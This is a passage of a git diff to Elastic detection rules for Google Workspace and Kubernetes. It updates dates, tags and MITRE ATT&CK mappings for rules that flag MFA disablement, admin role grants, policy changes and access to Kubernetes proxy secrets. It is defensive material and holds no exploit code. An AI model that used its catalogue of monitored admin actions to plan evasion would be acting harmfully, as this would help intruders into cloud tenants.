Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.007" -name = "Disable or Modify Cloud Firewall" -reference = "https://attack.mitre.org/techniques/T1562/007/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml index 09ecde61c16..a0a8211ec53 100644 --- a/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml +++ b/rules/integrations/google_workspace/defense_evasion_restrictions_for_marketplace_modified_to_allow_any_app.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/25" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -108,19 +108,13 @@ event.dataset:"google_workspace.admin" and event.action:"CHANGE_APPLICATION_SETT [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml index 5c62a0f8be1..04e49aa2abd 100644 --- a/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml +++ b/rules/integrations/google_workspace/impact_google_workspace_mfa_enforcement_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,13 +84,7 @@ references = [ risk_score = 47 rule_id = "cad4500a-abd7-4ef3-b5d3-95524de7cfe1" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Configuration Audit", - "Tactic: Impact", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -103,14 +97,36 @@ event.dataset:google_workspace.admin and event.provider:admin [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml index 9da5f09028e..39173e2ad0e 100644 --- a/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml +++ b/rules/integrations/google_workspace/initial_access_external_user_added_to_google_workspace_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/16" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,13 +86,7 @@ references = [ risk_score = 47 rule_id = "38f384e0-aef8-11ed-9a38-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -104,19 +98,13 @@ iam where event.dataset == "google_workspace.admin" and event.action == "ADD_GRO [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml index e3a60da3cd3..4c6bd7ab17f 100644 --- a/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml +++ b/rules/integrations/google_workspace/initial_access_google_workspace_suspended_user_renewed.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,13 +77,7 @@ references = [ risk_score = 21 rule_id = "00678712-b2df-11ed-afe9-f661ea17fbcc" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -94,19 +88,23 @@ event.dataset:google_workspace.admin and event.category:iam and event.action:UNS [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml index 46a1d328e83..7f270de664b 100644 --- a/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml +++ b/rules/integrations/google_workspace/initial_access_object_copied_to_external_drive_with_app_consent.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/07" integration = ["google_workspace"] maturity = "production" -updated_date = "2025/02/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,12 +89,7 @@ references = [ risk_score = 47 rule_id = "f33e68a4-bd19-11ed-b02f-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Execution", "Tactic: Persistence", "Data Source: Google Workspace", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -116,19 +111,31 @@ sequence by source.user.email with maxspan=3m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" +id = "T1204.001" +name = "Malicious Link" +reference = "https://attack.mitre.org/techniques/T1204/001/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml index 90cf5ef9b6e..3433348477a 100644 --- a/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml +++ b/rules/integrations/google_workspace/persistence_application_added_to_google_workspace_domain.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -104,8 +104,12 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml index 4647fb4aed4..9dc67a9a58a 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_2sv_policy_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/26" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -86,13 +86,7 @@ references = [ risk_score = 47 rule_id = "5e161522-2545-11ed-ac47-f661ea17fbce" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -103,14 +97,36 @@ event.dataset:"google_workspace.login" and event.action:"2sv_disable" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml index a23661911b2..1439fc968b1 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_admin_role_assigned_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,13 +89,7 @@ references = [ risk_score = 73 rule_id = "68994a6c-c7ba-4e82-b476-26a26877adf6" severity = "high" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -107,19 +101,36 @@ event.dataset:"google_workspace.admin" and event.category:"iam" and event.action [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml index 643c9d27e06..5342d9390fe 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,13 +87,7 @@ references = [ risk_score = 47 rule_id = "ad3f2807-2b3e-47d7-b282-f84acbbe14be" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -104,14 +98,36 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml index 986aac4bd3d..c7acf7764c1 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,13 +85,7 @@ references = [ risk_score = 47 rule_id = "a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -111,14 +105,13 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml index 040e19fdd98..b71a1ab8f60 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,13 +89,7 @@ references = [ risk_score = 47 rule_id = "6f435062-b7fc-4af9-acea-5b1ead65c5a5" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Persistence", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -106,14 +100,36 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml index cb0bc8fec70..257ab1403ac 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/06" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,13 +88,7 @@ references = [ risk_score = 21 rule_id = "cc6a8a20-2df2-11ed-8378-f661ea17fbce" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Configuration Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Google Workspace", "Use Case: Configuration Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -106,19 +100,36 @@ event.dataset:"google_workspace.admin" and event.type:change and event.category: [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml index 8bc3d051239..13b9f2a5eef 100644 --- a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml +++ b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,13 +83,7 @@ references = [ risk_score = 47 rule_id = "e555105c-ba6d-481f-82bb-9b633e7b4827" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Google Workspace", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Google Workspace", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -100,14 +94,36 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml index 0a6f1a1293f..e4be94a152b 100644 --- a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml +++ b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,15 +70,7 @@ references = [ risk_score = 47 rule_id = "220d92c6-479d-4a49-9cc0-3a29756dad0c" severity = "medium" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Domain: Cloud", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Collection", - "Resources: Investigation Guide", -] +tags = ["Tactic: Credential Access", "Tactic: Impact", "Data Source: Kubernetes", "Domain: Kubernetes", "Domain: Cloud", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -111,31 +103,36 @@ FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/kubernetes/defense_evasion_events_deleted.toml b/rules/integrations/kubernetes/defense_evasion_events_deleted.toml index 106c1158e52..cf03e321426 100644 --- a/rules/integrations/kubernetes/defense_evasion_events_deleted.toml +++ b/rules/integrations/kubernetes/defense_evasion_events_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/27" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/01/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -74,11 +74,6 @@ id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" -[[rule.threat.technique.subtechnique]] -id = "T1070.004" -name = "File Deletion" -reference = "https://attack.mitre.org/techniques/T1070/004/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml index 7e2e716541f..6226a49b4c1 100644 --- a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml +++ b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -69,13 +69,7 @@ references = [ risk_score = 21 rule_id = "63c056a0-339a-11ed-a261-0242ac120002" severity = "low" -tags = [ - "Data Source: Kubernetes", - "Domain: Kubernetes", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Resources: Investigation Guide", -] +tags = ["Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Kubernetes", "Domain: Kubernetes", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -88,6 +82,24 @@ user_agent.original:(* and not (*kubernetes/$Format or karpenter or csi-secrets- [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -97,7 +109,6 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml index 359940c58b7..5b03ba10457 100644 --- a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml +++ b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml @@ -2,7 +2,7 @@ creation_date = "2022/06/30" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,6 +91,11 @@ kubernetes.audit.objectRef.resource:("selfsubjectaccessreviews" or "selfsubjectr [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -100,7 +105,6 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml index 25df5e78816..f670851fa90 100644 --- a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml +++ b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["kubernetes"] maturity = 